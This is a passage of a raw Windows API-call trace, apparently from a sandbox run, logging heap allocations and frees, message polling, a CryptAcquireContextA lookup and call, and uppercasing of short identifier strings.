hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0162.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0162.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0162.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0162.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0162.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0162.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0162.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0162.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.068] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0162.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0162.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0162.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0162.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0162.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0162.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0162.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0162.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0162.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0162.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0162.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0162.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0162.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0162.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0162.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0162.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0162.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0162.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0162.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0162.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0162.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0162.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0162.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0162.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0162.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e10, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0162.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0162.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0162.070] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0162.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0162.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0162.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0162.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e10, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0162.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0162.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0162.071] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0162.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0162.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0162.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36f8 | out: hHeap=0x25c0000) returned 1 [0162.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0162.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0162.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0162.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0162.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0162.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0162.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0162.071] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xab2890) returned 1 [0162.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0162.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0162.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0162.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0162.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0162.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0162.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0162.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0162.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0162.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0162.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0162.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0162.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0162.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0162.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0162.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0162.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0162.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0162.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0162.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0162.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0162.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0162.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0162.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0162.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0162.074] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0162.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0162.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0162.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0162.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0162.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0162.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0162.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0162.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0162.074] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0162.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0162.074] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0162.075] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0162.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0162.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0162.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0162.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0162.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0162.075] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0162.075] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.075] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0162.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0162.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0162.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0162.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0162.075] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.075] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.075] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.075] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0162.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0162.076] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0162.076] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0162.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0162.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0162.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0162.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0162.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.076] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0162.076] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.077] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0162.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0162.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0162.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0162.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.077] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.077] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0162.077] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0162.077] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0162.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0162.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0162.078] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0162.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0162.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0162.078] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0162.078] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0162.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0162.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0162.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0162.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0162.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0162.078] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0162.078] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.078] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0162.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0162.078] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0162.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0162.079] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0162.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0162.079] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0162.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0162.079] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0162.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0162.079] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0162.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0162.079] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0162.079] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0162.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0162.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0162.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0162.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0162.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0162.079] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0162.080] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.080] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0162.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0162.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0162.080] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0162.080] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0162.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0162.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0162.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0162.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0162.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0162.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0162.080] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0162.080] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0162.080] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0162.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0162.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0162.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0162.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0162.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0162.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 